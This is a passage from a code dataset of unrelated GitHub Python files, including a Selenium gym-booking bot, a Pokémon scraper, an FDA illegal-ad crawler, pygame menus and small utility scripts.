self.dropout(sentence_tensor)\n if self.locked_dropout:\n sentence_tensor = self.locked_dropout(sentence_tensor)\n if self.word_dropout:\n sentence_tensor = self.word_dropout(sentence_tensor)\n\n # reproject if set\n if self.reproject_words:\n sentence_tensor = self.word_reprojection_map(sentence_tensor)\n\n # push through RNN\n packed = pack_padded_sequence(\n sentence_tensor, lengths, enforce_sorted=False, batch_first=True\n )\n rnn_out, hidden = self.rnn(packed)\n outputs, output_lengths = pad_packed_sequence(rnn_out, batch_first=True)\n\n # after-RNN dropout\n if self.dropout:\n outputs = self.dropout(outputs)\n if self.locked_dropout:\n outputs = self.locked_dropout(outputs)\n\n # extract embeddings from RNN\n for sentence_no, length in enumerate(lengths):\n last_rep = outputs[sentence_no, length - 1]\n\n embedding = last_rep\n if self.bidirectional:\n first_rep = outputs[sentence_no, 0]\n embedding = torch.cat([first_rep, last_rep], 0)\n\n if self.static_embeddings:\n embedding = embedding.detach()\n\n sentence = sentences[sentence_no]\n sentence.set_embedding(self.name, embedding)\n\n def _apply(self, fn):\n\n # models that were serialized using torch versions older than 1.4.0 lack the _flat_weights_names attribute\n # check if this is the case and if so, set it\n for child_module in self.children():\n if isinstance(child_module, torch.nn.RNNBase) and not hasattr(child_module, \"_flat_weights_names\"):\n _flat_weights_names = []\n\n if child_module.__dict__[\"bidirectional\"]:\n num_direction = 2\n else:\n num_direction = 1\n for layer in range(child_module.__dict__[\"num_layers\"]):\n for direction in range(num_direction):\n suffix = \"_reverse\" if direction == 1 else \"\"\n param_names = [\"weight_ih_l{}{}\", \"weight_hh_l{}{}\"]\n if child_module.__dict__[\"bias\"]:\n param_names += [\"bias_ih_l{}{}\", \"bias_hh_l{}{}\"]\n param_names = [\n x.format(layer, suffix) for x in param_names\n ]\n _flat_weights_names.extend(param_names)\n\n setattr(child_module, \"_flat_weights_names\",\n _flat_weights_names)\n\n child_module._apply(fn)","repo_name":"boschresearch/adversarial_meta_embeddings","sub_path":"src/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":23189,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"70146171939","text":"import os\n\nimport cv2\nimport numpy as np\n\n\ndef merge(in_dir,out_dir):\n out_img=np.zeros((4088,3066,3),np.uint8)\n for i in reversed(range(11)):\n img_path=os.path.join(in_dir,\"cam0_block\"+str(i)+'.jpg')\n if not os.path.exists(img_path):\n continue\n img=cv2.imread(img_path)\n mask=img>20\n out_img[mask]=img[mask]\n cv2.imwrite(os.path.join(out_dir,\"{}.jpg\".format(i)),out_img)\n\nmerge(r'J:\\xuningli\\cross-view\\ns\\nerfstudio\\renders\\dortmund_blocks_2_16\\30k_vis',r'J:\\xuningli\\cross-view\\ns\\nerfstudio\\renders\\dortmund_blocks_2_16\\30k_vis\\new')\n","repo_name":"GDAOSU/MCT_NERF","sub_path":"mct/script/merge_block_img.py","file_name":"merge_block_img.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"73285361057","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.touch_actions import TouchActions\nfrom datetime import timedelta\nfrom datetime import datetime\nimport tkinter\n\nclass ArcBooker():\n\tdef __init__(self):\n\t\turl = \"https://getactive.gogaelsgo.com/Program/GetProducts?classification=b2e9f15b-dbaa-4f55-8bb3-6c1ca1c00e32\"\n\t\toptions = webdriver.ChromeOptions()\n\t\toptions.add_argument(\"--enable-javascript\")\n\t\toptions.add_argument(\"--headless\")\n\t\toptions.add_argument(\"--no-sandbox\")\n\t\tself.driver = webdriver.Chrome(chrome_options=options)\n\n\t\tself.driver.get(url)\n\t\tself.driver.execute_script(\"javascript:showLogin('/Program/GetProducts?classification=b2e9f15b-dbaa-4f55-8bb3-6c1ca1c00e32')\")\n\t\tprint(self.driver.current_url)\n\t\ttime.sleep(1)\n\t\tself.driver.find_element_by_css_selector(\"button.loginOption.btn.btn-lg.btn-block.btn-social.btn-soundcloud\").click()\n\t\tprint(self.driver.current_url)\n\t\ttime.sleep(2)\n\n\t\tusername_box = self.driver.find_element_by_id(\"username\")\n\t\tusername_box.send_keys(\"\") #Your Username\n\n\t\tpassword_box = self.driver.find_element_by_id(\"password\")\n\t\tpassword_box.send_keys(\"\") #Your password\n\n\t\tself.driver.find_element_by_xpath(\"//*[@id='qw-region-content-inner']/div/form/div[3]/button\").click()\n\t\ttime.sleep(1)\n\t\tprint(self.driver.current_url)\n\n\t\tworkoutZones = self.driver.find_elements_by_css_selector(\"h4.TitleText-SP\")\n\t\tfor zone in workoutZones:\n\t\t\tprint(zone.text)\n\t\t\tif zone.text == \"L2 Conditioning Zone - Dumbbell Free Weights\": #Preferred workout zone\n\t\t\t\tprint(\"Correct zone found\")\n\t\t\t\tzone.click()\n\t\t\t\tbreak\n\n\t\tbookDate = str(datetime.date(datetime.now()+timedelta(days=3))) + \" 08:30:00\" #Preferred workout time\n\n\t\tprint(\"Attempting to book on \" + bookDate)\n\n\t\ttime_slots = self.driver.find_elements_by_css_selector(\"button.btn.btn-primary.pull-left\")\n\t\tprint(\"There are \" + str(len(time_slots)) + \" timeslots\")\n\t\tisFound = False\n\t\tfor time_slot in time_slots:\n\t\t\tinfo = time_slot.get_attribute(\"onClick\")\n\t\t\tsplitInfo = info.split(\"'\")\n\t\t\tcheckIn = str(datetime.strptime(splitInfo[7], '%m/%d/%Y %I:%M:%S %p'))\n\t\t\tcheckOut = str(datetime.strptime(splitInfo[9], '%m/%d/%Y %I:%M:%S %p'))\n\t\t\tprint(\"From \" + checkIn + \" to \" + checkOut)\n\t\t\tif checkIn == bookDate:\n\t\t\t\tprint(\"Prefered time available, booking now\")\n\t\t\t\ttime_slot.click()\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself.driver.find_element_by_xpath(\"//*[@id='btnAccept']\").click()\n\t\t\t\tself.driver.find_element_by_xpath(\"//*[@id='checkoutButton']\")\n\t\t\t\tisFound = True\n\t\t\t\tbreak\n\t\t\n\t\tif not isFound:\n\t\t\tprint(\"Time not found please try another\")\n\t\t\t\n\nif __name__ == \"__main__\":\n\tr = ArcBooker()","repo_name":"trombonee/ArcBooker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19878132259","text":"import pygame\r\nimport sprites\r\n\r\n\r\n\r\ndef level(game):\r\n main_button = sprites.Button(400, 640, 'Main menu', game.middle_font)\r\n hard_button = sprites.Button(400, 480, 'Hard', game.middle_font)\r\n medium_button = sprites.Button(400, 400, 'Medium', game.middle_font)\r\n easy_button = sprites.Button(400, 320, 'Easy', game.middle_font)\r\n\r\n menu_run = True\r\n while menu_run:\r\n\r\n pos = pygame.mouse.get_pos()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n return False\r\n if event.type == pygame.KEYDOWN:\r\n return 350\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if main_button.be_inside(pos[0], pos[1]):\r\n return 350\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if hard_button.be_inside(pos[0], pos[1]):\r\n return 30\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if medium_button.be_inside(pos[0], pos[1]):\r\n return 80\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if easy_button.be_inside(pos[0], pos[1]):\r\n return 150\r\n\r\n main_button.update(pos[0], pos[1])\r\n hard_button.updatel(pos[0], pos[1])\r\n medium_button.updatel(pos[0], pos[1])\r\n easy_button.updatel(pos[0], pos[1])\r\n\r\n game.screen.fill((127, 255, 212))\r\n game.draw_overlay()\r\n \r\n\r\n game.screen.blit(main_button.image, main_button.rect)\r\n game.screen.blit(hard_button.image, hard_button.rect)\r\n game.screen.blit(medium_button.image, medium_button.rect)\r\n game.screen.blit(easy_button.image, easy_button.rect)\r\n pygame.display.flip()\r\n\r\n game.clock.tick(20)\r\n","repo_name":"anastaysha15/amorba3","sub_path":"level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25291060549","text":"import argparse\nimport json\nimport logging\nimport bs4\nimport requests\n\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\nOUTPUT_FILE = 'pokemon.json'\n\nPARSER = argparse.ArgumentParser(description='A Pokémon web scraper')\nPARSER.add_argument('-s', '--save', action='store_true',\n help='save the output to JSON')\nPARSER.add_argument('-f', '--first', default=1, type=int,\n help='the number of the first Pokémon to retrieve')\nPARSER.add_argument('-l', '--last', default=1, type=int,\n help='the number of the last Pokémon to retrieve')\nPARSER.add_argument('-v', '--verbose', action='store_true',\n help='print the Pokémon\\'s statistics to console')\nARGS = PARSER.parse_args()\n\n\ndef get_pokemon_data(urls):\n \"\"\"\n Scrape Pokémon data from Serebii.net and output to console.\n :param urls: URLs to extract the data from.\n \"\"\"\n pokemon_list = []\n\n for url in urls:\n LOGGER.info('Extracting data from Serebii.net')\n data = requests.get(url)\n soup = bs4.BeautifulSoup(data.text, 'html.parser')\n try:\n all_divs = soup.find_all('div', attrs={'align': 'center'})\n center_panel_info = all_divs[1].findAll('td', {'class': 'fooinfo'})\n except Exception:\n LOGGER.error(\n 'There was an error trying to identify HTML elements on the webpage.')\n raise\n\n pokemon = dict()\n pokemon['name'] = center_panel_info[1].text\n pokemon['number'] = center_panel_info[3].text\n pokemon['classification'] = center_panel_info[4].text\n pokemon['height'] = (center_panel_info[5].text).split('\\r\\n\\t\\t\\t')\n pokemon['weight'] = (center_panel_info[6].text).split('\\r\\n\\t\\t\\t')\n\n try:\n base_stats_table = soup.find(\n 'a', attrs={'name': 'stats'}).find_next('table')\n base_stats_td = base_stats_table.findAll('td')\n except Exception:\n LOGGER.error(\n 'There was an error trying to identify HTML elements on the webpage.')\n raise\n\n pokemon['hit_points'] = int(base_stats_td[8].text)\n pokemon['attack'] = int(base_stats_td[9].text)\n pokemon['defense'] = int(base_stats_td[10].text)\n pokemon['special'] = int(base_stats_td[11].text)\n pokemon['speed'] = int(base_stats_td[12].text)\n\n if not ARGS.save or ARGS.verbose:\n print_pokemon_data(pokemon)\n LOGGER.info('Adding %s %s to dataset',\n pokemon['number'], pokemon['name'])\n pokemon_list.append(pokemon)\n\n if ARGS.save:\n LOGGER.info('Saving to %s', OUTPUT_FILE)\n save_to_json(pokemon_list)\n else:\n LOGGER.info(\n 'All Pokémon retrieved! To save to JSON, use the --save flag')\n\n\ndef save_to_json(pokemon_list):\n \"\"\"\n Save Pokémon array to JSON file.\n :param pokemon_list: Array of Pokémon data.\n \"\"\"\n with open(OUTPUT_FILE, mode='w', encoding='utf-8') as output_file:\n json.dump(pokemon_list, output_file, indent=4)\n\n\ndef print_pokemon_data(pokemon):\n \"\"\"\n Print formatted Pokémon data.\n :param pokemon: Pokémon object containing statistics.\n \"\"\"\n print('Name\\t\\t', pokemon['name'])\n print('Number\\t\\t', pokemon['number'])\n print('Classification\\t', pokemon['classification'])\n print('Height\\t\\t', ' '.join(str(i) for i in pokemon['height']))\n print('Weight\\t\\t', ' '.join(str(i) for i in pokemon['weight']))\n print('HP\\t\\t', pokemon['hit_points'])\n print('Attack\\t\\t', pokemon['attack'])\n print('Defense\\t\\t', pokemon['defense'])\n print('Special\\t\\t', pokemon['special'])\n print('Speed\\t\\t', pokemon['speed'])\n\n\nif __name__ == '__main__':\n try:\n URLS = ['https://serebii.net/pokedex/{}.shtml'.format(str(x).zfill(3))\n for x in range(ARGS.first, ARGS.last + 1)]\n get_pokemon_data(URLS)\n except Exception as ex:\n LOGGER.error(ex)\n raise\n\n\ndef function_desfase(tabla, tipo):\n tabla = tabla.withColumn(\n \"gf_default_type\",\n f.when(\n (f.col(\"gf_basel_criteria_ent_st_type\") == \"M\")\n & (f.col(\"gf_default_type\") != \"S\")\n & dates_after_default(),\n \"R\",\n ).otherwise(f.col(\"gf_default_type\")),\n )\n tabla = tabla.withColumn(\n \"gf_ope_default_days_number\",\n f.when(\n notmissing(\"gf_ope_default_days_number\") & dates_after_default(),\n f.greatest(\n f.lit(0), f.col(\"gf_ope_default_days_number\") - f.col(\"desfase\")\n ),\n ).otherwise(f.col(\"gf_ope_default_days_number\")),\n )\n tabla = tabla.withColumn(\n \"gf_cust_default_days_number\",\n f.when(\n notmissing(\"gf_cust_default_days_number\") & dates_after_default(),\n f.greatest(\n f.lit(0), f.col(\"gf_cust_default_days_number\") - f.col(\"desfase\")\n ),\n ).otherwise(f.col(\"gf_cust_default_days_number\")),\n )\n tabla = tabla.withColumn(\n \"gf_elapsed_term_number\",\n f.when(\n notmissing(\"gf_elapsed_term_number\") & dates_after_default(),\n f.greatest(f.lit(0), f.col(\"gf_elapsed_term_number\") - f.col(\"desfase\")),\n ).otherwise(f.col(\"gf_elapsed_term_number\")),\n )\n if tipo == \"mayorista\":\n tabla = tabla.withColumn(\n \"gf_resdl_trm_title_days_number\",\n f.when(\n notmissing(\"gf_resdl_trm_title_days_number\") & dates_after_default(),\n f.greatest(\n f.lit(0), f.col(\"gf_resdl_trm_title_days_number\") + f.col(\"desfase\")\n ),\n ).otherwise(f.col(\"gf_resdl_trm_title_days_number\")),\n )\n tabla = tabla.withColumn(\n \"gf_cont_residual_term_number\",\n f.when(\n notmissing(\"gf_cont_residual_term_number\") & dates_after_default(),\n f.greatest(\n f.lit(0), f.col(\"gf_cont_residual_term_number\") + f.col(\"desfase\")\n ),\n ).otherwise(f.col(\"gf_cont_residual_term_number\")),\n )\n # prioridad 2\n tabla = (\n tabla.withColumn(\n \"gf_basel_criteria_ent_st_type\",\n f.when(prioridad2() & dates_after_default(), \"M\").otherwise(\n f.col(\"gf_basel_criteria_ent_st_type\")\n ),\n )\n .withColumn(\n \"gf_default_type\",\n f.when(prioridad2() & dates_after_default(), \"R\").otherwise(\n f.col(\"gf_default_type\")\n ),\n )\n .withColumn(\n \"gf_cust_default_days_number\",\n f.when(\n prioridad2() & dates_after_default(),\n f.months_between(\n f.lit(f.col(tp_tipo[tipo][\"exit\"])),\n f.lit(f.col(\"gf_init_default_date\")),\n )\n / 12,\n ).otherwise(f.col(\"gf_cust_default_days_number\")),\n )\n .withColumn(\n \"gf_ope_default_days_number\",\n f.when(\n prioridad2() & dates_after_default(),\n f.least(\n f.col(\"gf_cust_default_days_number\"),\n f.col(\"gf_elapsed_term_number\"),\n ),\n )\n .otherwise(\"gf_ope_default_days_number\")\n )\n )\n return tabla\n\n","repo_name":"mchoque93/pokemon","sub_path":"scaper.py","file_name":"scaper.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5146169722","text":" # This program is free software: you can redistribute it and/or modify\n # it under the terms of the GNU General Public License as published by\n # the Free Software Foundation, either version 3 of the License, or\n # (at your option) any later version.\n\n # This program is distributed in the hope that it will be useful,\n # but WITHOUT ANY WARRANTY; without even the implied warranty of\n # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n # GNU General Public License for more details.\n\n # You should have received a copy of the GNU General Public License\n # along with this program. If not, see .\n \nimport sys\nimport os.path\n\nif os.path.isfile(os.path.join('..', 'ui', 'main.ui')):\n DIR_PREFIX = '..'\n DIR_UI = os.path.join(DIR_PREFIX, 'ui')\n DIR_CFG = os.path.join(DIR_PREFIX, 'config')\n DIR_ICON = os.path.join(DIR_PREFIX, 'icons')\nelse:\n DIR_PREFIX = os.path.join(os.path.expanduser('~'),'.local','KvFront')\n DIR_UI = os.path.join(DIR_PREFIX, 'ui')\n DIR_CFG = os.path.join(DIR_PREFIX, 'config')\n\n DIR_PREFIX2 = os.path.join(os.path.expanduser('~'),'.local','share')\n DIR_ICON = os.path.join(DIR_PREFIX2, 'icons')\n \n print(\"DIR_UI:\" + DIR_UI)\n print(\"DIR_CFG:\" + DIR_CFG)\n print(\"DIR_ICON:\" + DIR_ICON)\n\n\nFILE_UI_MAIN = os.path.join(DIR_UI, 'main.ui')\nFILE_UI_ADDSERVER = os.path.join(DIR_UI, 'addserver.ui')\nFILE_UI_NEWREDISKEY = os.path.join(DIR_UI, 'newrediskey.ui')\nFILE_UI_NEWMEMKEY = os.path.join(DIR_UI, 'newmemkey.ui')\nFILE_UI_DETAILPAGE = os.path.join(DIR_UI, 'detailpage-2.ui')\nFILE_UI_DETAILPAGE4REDIS = os.path.join(DIR_UI, 'detailpage4redis-2.ui')\nFILE_SERVER_CFG = os.path.join(DIR_CFG, 'server.conf')\n","repo_name":"wgalaxy/KvFront","sub_path":"KvFront/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"40805837387","text":"import string\nfrom operator import itemgetter\n\n# This entire script will be moved into a function to be called by another script.\n# This other script will import the newest tweets into an array then remove all dupes\n# from the array. This shortened array will be passed to the strip function. The\n# stripped array will then be appended to the cache.\n\n# These are the 100 most commonly used words in English according to Wikipedia.\nremovedWords = [\"the\",\"be\",\"to\",\"of\",\"and\",\"a\",\"in\",\"that\",\"have\",\"i\",\"it\",\"for\",\"not\",\"on\",\"with\",\"he\",\"as\",\"you\",\"do\",\"at\",\"this\",\"but\",\"his\",\"by\",\"from\",\"they\",\"we\",\"say\",\"her\",\"she\",\"or\",\"an\",\"will\",\"my\",\"one\",\"all\",\"would\",\"there\",\"their\",\"what\",\"so\",\"up\",\"out\",\"if\",\"about\",\"who\",\"get\",\"which\",\"go\",\"me\",\"when\",\"make\",\"can\",\"like\",\"time\",\"no\",\"just\",\"him\",\"know\",\"take\",\"people\",\"into\",\"year\",\"your\",\"good\",\"some\",\"could\",\"them\",\"see\",\"other\",\"than\",\"then\",\"now\",\"look\",\"only\",\"come\",\"its\",\"over\",\"think\",\"also\",\"back\",\"after\",\"use\",\"two\",\"how\",\"our\",\"work\",\"first\",\"well\",\"way\",\"even\",\"new\",\"want\",\"because\",\"any\",\"these\",\"give\",\"day\",\"most\",\"us\",\"\"]\n\ndef main(uncleanList):\n\tcleanedList = []\n\t\n\tfor item in uncleanList:\n\t\twords = string.split(item[\"text\"])\n\t\tnewWords = []\n\t\twhile len(words)>0:\n\t\t\t# This lowercases the words, strips punctuation, then removes mid-word apostrophes to\n\t\t\t# handle posessives. I don't know whether anyone is going to hashtag the name of the\n\t\t\t# person they have a crush on so I included octothorpes in the punctuation filter.\n\t\t\tword = string.split(string.strip(string.lower(words.pop()),\",.!?';:#\"),\"'\")[0]\n\t\t\t\n\t\t\t# This handles mid-word periods because half the people who post on this Twitter\n\t\t\t# feed are dumbasses.\n\t\t\tif \".\" in word:\n\t\t\t\tsubwords = string.split(word)\n\t\t\t\tfor subword in subwords:\n\t\t\t\t\tadd = True\n\t\t\t\t\tfor rmWord in removedWords:\n\t\t\t\t\t\tif rmWord == subword:\n\t\t\t\t\t\t\tadd = False\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif add:\n\t\t\t\t\t\tnewWords.append(subword)\n\t\t\telse:\n\t\t\t\tadd = True\n\t\t\t\tfor rmWord in removedWords:\n\t\t\t\t\tif rmWord == word:\n\t\t\t\t\t\tadd = False\n\t\t\t\t\t\tbreak\n\t\t\t\tif add:\n\t\t\t\t\tnewWords.append(word)\n\t\tcleanedItem = {\"words\" : newWords,\"id\" : item[\"id_str\"],\"date\" : item[\"created_at\"],\"coincidence\":0}\n\t\tcleanedList.append(cleanedItem)\n\treturn cleanedList","repo_name":"revan/cRUshfinder","sub_path":"strip.py","file_name":"strip.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18156712497","text":"import numpy as np\nimport pandas as pd\nimport re\nimport os\n\n\nimport argparse\nparser = argparse.ArgumentParser(description='Train encoders.')\n\nparser.add_argument('-o', '--expfile', type=str,\n\t\t\t\t\thelp='Experiment file.')\nparser.add_argument('-f', '--features', nargs='+', default=[])\n\n\nl2_rate = 0.0008\ndropout = 0.5\n\ndef find_number(text, c):\n return re.findall(r'%s(-?\\d+\\.\\d+)' % c, text)\n\ndef substring_after(s, delim):\n return s.partition(delim)[0]\n\ndef create_features(train_encoders_best_file, features): #features: array --> e.g., [\"color\", \"vein\"]\n experiments = pd.read_csv(train_encoders_best_file, index_col=[0])\n data = experiments[experiments['feature'].isin(features)]\n model_files = data['model_file'].unique()\n l2_rates_values = data['l2_rate'].values\n dropout_values = data['dropout'].values\n data = data.drop(columns={'feature', 'model_file', 'val_acc', 'test_acc', 'l2_rate' , 'dropout'})\n data = data.drop_duplicates(keep='first', inplace=False)\n data.reset_index(drop=True, inplace=True)\n data['feature'] = np.asarray([','.join(features) for i in range(len(data))])\n data['model_file'] = [substring_after(model_files[0], 'ENCODER') + 'ENCODER-{}-l2rate{}-dropout{}-fold{}.h5'.format('_'.join(features), l2_rate, dropout, i) for i in range(data.shape[0])]\n if len(features) != 1:\n data['l2_rate'] = l2_rate* np.ones(10)\n data['dropout'] = dropout* np.ones(10)\n else:\n data['l2_rate'] = l2_rates_values\n data['dropout'] = dropout_values\n\n return data\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n features = args.features\n data = create_features(args.expfile, features)\n #Save data\n name_file = \"features_data/\" + \"_\".join(features) + \"_feature.csv\"\n data.to_csv(name_file, index=False)\n print(f\"File {name_file} already saved.\")\n","repo_name":"Tayerquach/Flavia_recognition","sub_path":"prepare_features.py","file_name":"prepare_features.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"27749349461","text":"# Завдання №1\nprint(' 1. Реалізуйте генераторну функцію, яка повертатиме по одному члену геометричної прогресії із зазначеним \\n'\n 'множником.Генератор повинен зупинити свою роботу або після досягнення зазначеного елементу, або при передачі\\n'\n 'команди на завершення.')\n\n\ndef geom_prog(multipler, stop_element):\n element = 1\n while element <= stop_element:\n yield element\n element *= multipler\n if element > stop_element:\n return\n\n\nfor n in geom_prog(2, 20):\n print(n)\n\n# Завдання №2\nprint(' 2. Реалізуйте свій аналог генераторної функції range().')\n\n\ndef my_copy_range(start, end, step=1):\n numbers = []\n for i in range(start, end, step):\n numbers.append(i)\n return numbers\n\n\nprint(my_copy_range(0, 10))\n\n# Завдання №3\nprint(' 3. Напишіть функцію-генератор, яка повертатиме прості числа. Верхня межа діапазону повинна бути задана \\n'\n 'параметром цієї функції')\n\n\ndef prime_num(limit):\n for num in range(2, limit + 1):\n divider = 2\n while divider < num:\n if not num % divider:\n break\n divider += 1\n else:\n yield num\n return\n\n\ng = prime_num(5)\nprint(next(g))\nprint(next(g))\nprint(next(g))\n\n\n# Завдання №4\nprint(' 4. Напишіть генераторний вираз для заповнення списку. Список повинен бути заповнений кубами чисел від 2 до \\n'\n 'вказаної вами величини.')\n\n\ndef my_func(finish):\n cubes = []\n for start in range(2, finish + 1):\n yield start ** 3\n cubes.append(start ** 3)\n return cubes\n\n\nfor i in my_func(6):\n print(i)\n\n","repo_name":"doroshyulia/dorosh_yulia_prog_academy","sub_path":"Homework_OOP7.py","file_name":"Homework_OOP7.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33233831751","text":"import pygame\nimport random\nfrom pygame.locals import *\nfrom regular_polygons import *\n\n\nsize = width, height = 800, 800\n\nblack = 0,0,0\nwhite = 255,255,255\n\nscreen = pygame.display.set_mode(size)\n\nclock = pygame.time.Clock()\n\npygame.font.init()\n\nrunning = True\n\n\n# i = 3\n# tick = 0\n\nhx = Ennagram((400,400),390,0)\n\nwhile running:\n screen.fill(black)\n\n \n pygame.draw.polygon(screen, (255,255,255),hx.get_points(), width=1)\n #hx.rotate(0.1)\n # if tick == 10:\n # tick = 0\n # i+=1\n # else:\n # tick+=1\n # if i > 20:\n # i = 3\n\n pygame.display.update()\n clock.tick(60)","repo_name":"MassimoSandre/python_misc","sub_path":"regular_polygon/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13583572617","text":"import os\nimport logging\nfrom csv import writer, reader\nfrom datetime import date\nfrom random import randint\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom time import sleep\n\npwd = os.path.dirname(os.path.abspath(__file__)).replace('\\\\', '/')\n\n\ndef writeCsv(path, name, data, mode='w+'):\n if not os.path.isdir(path):\n os.makedirs(path)\n with open(f'{path}/{name}', mode=f'{mode}', encoding='utf-8-sig', newline='') as f:\n for a in data:\n writer(f).writerow(a)\n logging.info(f'{name} saved!')\n\n\ndef readCsv(path, name):\n return [c for c in reader(open(f'{path}/{name}', mode='r', encoding='utf-8-sig', newline=''))]\n\n\ndef yearsCalc(yearsAgo=0):\n '''列出最近3年年份'''\n a = []\n for b in range(0, yearsAgo):\n a.append(str(date.today().year - b))\n return a\n\n\ndef getLists(keyword, driver, data):\n sleepTime = randint(10, 20)\n res = driver.find_elements(By.CSS_SELECTOR, '.table_list tr')\n if len(res) == 0:\n writeCsv(f'{pwd}/csv', '違規紀錄.csv', [[keyword[0], '無違規紀錄']], mode='a+')\n for a in range(0, sleepTime):\n logging.info(f'wait {sleepTime - a} sec')\n sleep(1)\n return [keyword[0], len(res)]\n lastYear = res[len(res) - 1].find_elements(By.CSS_SELECTOR, 'td')[3].find_elements(By.CSS_SELECTOR, 'li')[1].text.split('.')[0]\n del res[0]\n for a in res:\n b = a.find_elements(By.CSS_SELECTOR, 'td')\n date = b[3].find_elements(By.CSS_SELECTOR, 'li')[1].text\n yearRange = yearsCalc(3)\n if str(1911 + int(date[0:3])) in yearRange:\n product = b[1].text\n url = b[1].find_element(By.CSS_SELECTOR, 'a[href]').get_attribute('href')\n company = b[2].text\n data.append([company, date, product, url])\n logging.info([company, date, product, url])\n elif str(1911 + int(date[0:3])) < yearRange[len(yearRange) - 1]:\n writeCsv(f'{pwd}/csv', '違規紀錄.csv', [[keyword[0], '違規紀錄三年以前']], mode='a+')\n for a in range(0, sleepTime):\n logging.info(f'wait {sleepTime - a} sec')\n sleep(1)\n return [lastYear, len(res)]\n\n\ndef getLinks(driver, keyword, data):\n driver.find_element(By.CSS_SELECTOR, '#ctl00_Content_txtVioCompany').clear()\n driver.find_element(By.CSS_SELECTOR, '#ctl00_Content_txtVioCompany').send_keys(keyword[0])\n driver.find_element(By.CSS_SELECTOR, '#ctl00_Content_btnSubmit').click()\n while True:\n lastYear = getLists(keyword, driver, data)\n if lastYear[1] == 0:\n logging.info(f'no result')\n break\n elif str(int(lastYear[0]) + 1911) in yearsCalc(3) and int(lastYear[0]) == 11:\n logging.info('next page')\n driver.find_element(By.CSS_SELECTOR, 'a.next').click()\n else:\n break\n writeCsv(f'{pwd}/csv', '違規紀錄_連結.csv', data)\n\n\ndef getVio(driver):\n links = readCsv(f'{pwd}/csv', '違規紀錄_連結.csv')\n data = []\n for link in links:\n driver.get(link[3])\n sleepTime = randint(10, 20)\n for a in range(0, sleepTime):\n logging.info(f'wait {sleepTime - a} sec')\n sleep(1)\n row = link[:-1]\n for a in driver.find_elements(By.CSS_SELECTOR, '.table_data tr'):\n b = a.find_element(By.CSS_SELECTOR, 'th').text\n if '違規情節' in b:\n row.append(a.find_element(By.CSS_SELECTOR, 'td').text)\n elif '查處情形' in b:\n row.append(a.find_element(By.CSS_SELECTOR, 'td').text)\n row.append(link[-1])\n data.append(row)\n writeCsv(f'{pwd}/csv', '違規紀錄.csv', data, mode='a+')\n if os.path.exists(f'{pwd}/csv/違規紀錄_連結.csv'):\n os.remove(f'{pwd}/csv/違規紀錄_連結.csv')\n\n\ndef main():\n data = []\n driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\n url = 'https://pmds.fda.gov.tw/illegalad/CaseSearch.aspx'\n writeCsv(f'{pwd}/csv', '違規紀錄.csv', [])\n driver.get(url)\n for keyword in readCsv(f'{pwd}/csv', 'keywords.csv'):\n try:\n getLinks(driver, keyword, data)\n except Exception as e:\n writeCsv(f'{pwd}/csv', '違規紀錄.csv', [[keyword, '抓取失敗!']], mode='a+')\n logging.warning(keyword[0], e, 'fail!')\n getVio(driver)\n driver.close()\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO, filename=f'{pwd}/.tmp/viorec.log')\n main()\n","repo_name":"Astalsi401/python","sub_path":"projects/crawler/illegalFda/illegal.py","file_name":"illegal.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32255653562","text":"\"\"\"\nA B C\nD E F\nG H I\n\nHow many path combinations can we get with such array with the following\nconstrainsts?\n\n1. We can't use any position twice.\n2. We're only allowed to travel one position unless we can \"fly over\" an\nused position.\n3. Weid semi-diagonal paths like B -> I are allowed, and such paths\ndon't \"fly over\" anything.\n4. Can't have more steps than introduced (counting starting point)\n\"\"\"\n\nfrom utils import *\n\nSTARTING_POINT = None \t# Must be a string from A to I\nSTEPS = None \t\t\t# Must be an integer\n\n\ndef solverOrchestration(STARTING_POINT, STEPS):\n\t\"\"\"\n\tCalculartes all possible combinations from STARTING_POINT\n\t\"\"\"\n\n\tpossiblePathsList = getPossiblePaths(STARTING_POINT)\n\n\t# Do 